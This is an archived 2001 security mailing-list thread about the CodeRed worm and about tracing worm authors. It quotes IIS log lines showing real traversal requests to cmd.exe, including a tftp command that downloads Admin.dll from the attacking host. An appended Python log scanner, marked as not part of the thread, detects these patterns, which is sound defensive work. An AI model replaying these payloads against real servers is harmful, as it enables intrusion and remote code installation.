Thank you. But we have earlier catches to almost an hour earlier. (I'm assuming your timestamp is PDT.) Appears a lot of people have running logs to gauge CodeRed. They saw this worm hit quite dramatically.

Jimmy

> -----Original Message-----
> From: J.Michael Cuciti [SMTP:mcuciti@private]
> Sent: Friday, September 21, 2001 1:44 PM
> To: Kuo Jimmy; Crispin Cowan; Jimmy Sadri
> Cc: crime@private
> Subject: Re: [RE: Any leads?]
>
> All:
>
> I still have a script trying to run, but the location and folder doesn't
> exist. This is what I found in my log file:
>
> 206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll,
>
> 206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, 206.98.124.52, 180, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll,
>
> 206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72, 273, 403, 5, GET, /scripts/root.exe, /c+dir,
>
> 206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, 96, 1652, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
>
> 208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97, 243, 500, 123, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
>
> If anybody knows what this is, please 'spain it to me.
>
> I am running IIS 3.0, NT4.0 w/sp3 (haven't upgraded, I inherited this, not
> my fault :-) )
>
> In the event log I see this same type of message running every few
> minutes. The script is supposedly running from
> \winnt\iisadmin\Scripts\..%5c..\admin.dll. This does not exist.
>
> Thanks...
>
> Mike Cuciti
> Network Service and Support Manager
> Tuality Healthcare
> 681.1749
>
>
> "Kuo, Jimmy" <Jimmy_Kuo@private> wrote:
> >The Melissa author was caught because he posted the infectious document
> >from his own AOL account to a news group, rather than releasing it
> >through a hacked account. His guilt was confirmed when the serial number
> >in the document matched the PC in the dumpster outside his bedroom :-)
>
> No. He used a hacked acct. But we identified the exact time of the use of
> the acct (newsgroup posting message ID) and the FBI traced the phone
> records.
>
> And the PC was destroyed and never located.
>
> Where did you get your version of the story?
>
> >But Code Red and its derivatives are not Office documents, and
> >therefore have no serial numbers. That investigators appear to have no
> >leads months after Code Red appeared tells me that it was likely
> >released to the wild from a compromised machine, or perhaps
> >simultaneously released from multiple compromised machines. If the
> >author(s) were good, then those compromised machines were initially
> >attacked from other compromised machines. Likely all of these initial
> >release vector machines have long since been wiped and re-installed, and
> >the links to the author(s) have been cut.
>
> We have some "first instances" of traffic. I don't know what the FBI's
> doing with the information gathered so far. But I agree that it's
> difficult and not likely.
>
> Jimmy
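As an added example (not part of this thread), a small Python scanner for the IIS log format quoted in Mike's message: it parses the comma-separated fields, decodes the URI once as IIS did, and flags traversal to cmd.exe, requests for root.exe, and tftp fetches, reporting whether IIS answered 200 (the command actually ran) or refused it. The sample entries are copied from the quoted log plus one constructed benign request; the "\xc1" byte is an assumption standing in for the mangled character the log shows as "Á".

```python
import re
from urllib.parse import unquote

# Microsoft IIS log format, in the field order the quoted entries use.
FIELDS = ["client_ip", "user", "date", "time", "service", "server", "server_ip",
          "time_taken", "bytes_recv", "bytes_sent", "status", "win32_status",
          "method", "uri_stem", "uri_query"]

# Three entries copied from the quoted log plus one constructed benign request;
# "\xc1" stands in for the mangled byte IIS logged where the overlong-encoded slash was.
SAMPLE_LOG = """\
206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\\Admin.dll,
206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72, 273, 403, 5, GET, /scripts/root.exe, /c+dir,
208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97, 243, 500, 123, GET, /scripts/..\xc1../winnt/system32/cmd.exe, /c+dir,
192.0.2.7, -, 9/18/01, 7:30:01, W3SVC, WWW, 206.98.124.52, 5, 60, 1200, 200, 0, GET, /default.htm, -,
"""

TRAVERSAL = re.compile(r"\.\..{0,2}[\\/]")          # "../", "..\" and the mangled "..?../" form
SHELL_TARGET = re.compile(r"/(cmd|root)\.exe$", re.I)
TFTP_FETCH = re.compile(r"tftp\s+-i\s+(\S+)\s+get\s+(\S+)", re.I)

def parse_line(line):
    """Split one IIS log entry into a dict, or return None if it is not 15 fields."""
    parts = [p.strip() for p in line.strip().rstrip(",").split(",")]
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None

def classify(rec):
    """Return the reasons a request looks like the worm traffic quoted above, if any."""
    stem = unquote(rec["uri_stem"])                 # one decode pass, as IIS did for %2f / %5c
    query = unquote(rec["uri_query"]).replace("+", " ")
    reasons = []
    if SHELL_TARGET.search(stem):
        reasons.append("request for command shell %s" % stem.rsplit("/", 1)[-1].lower())
    if TRAVERSAL.search(stem):
        reasons.append("directory traversal in URI")
    fetch = TFTP_FETCH.search(query)
    if fetch:
        reasons.append("tftp fetch of %s from %s" % (fetch.group(2), fetch.group(1)))
    return reasons

def scan(log_text):
    """Flag worm-style entries; 'executed' is True when IIS answered 200, i.e. the command ran."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        reasons = classify(rec) if rec else []
        if reasons:
            hits.append({"client_ip": rec["client_ip"], "time": rec["time"],
                         "executed": rec["status"] == "200", "reasons": reasons})
    return hits
```

Run `scan(SAMPLE_LOG)` over an exported log to list the offending client addresses and which of their requests IIS actually executed.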
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:42 PDT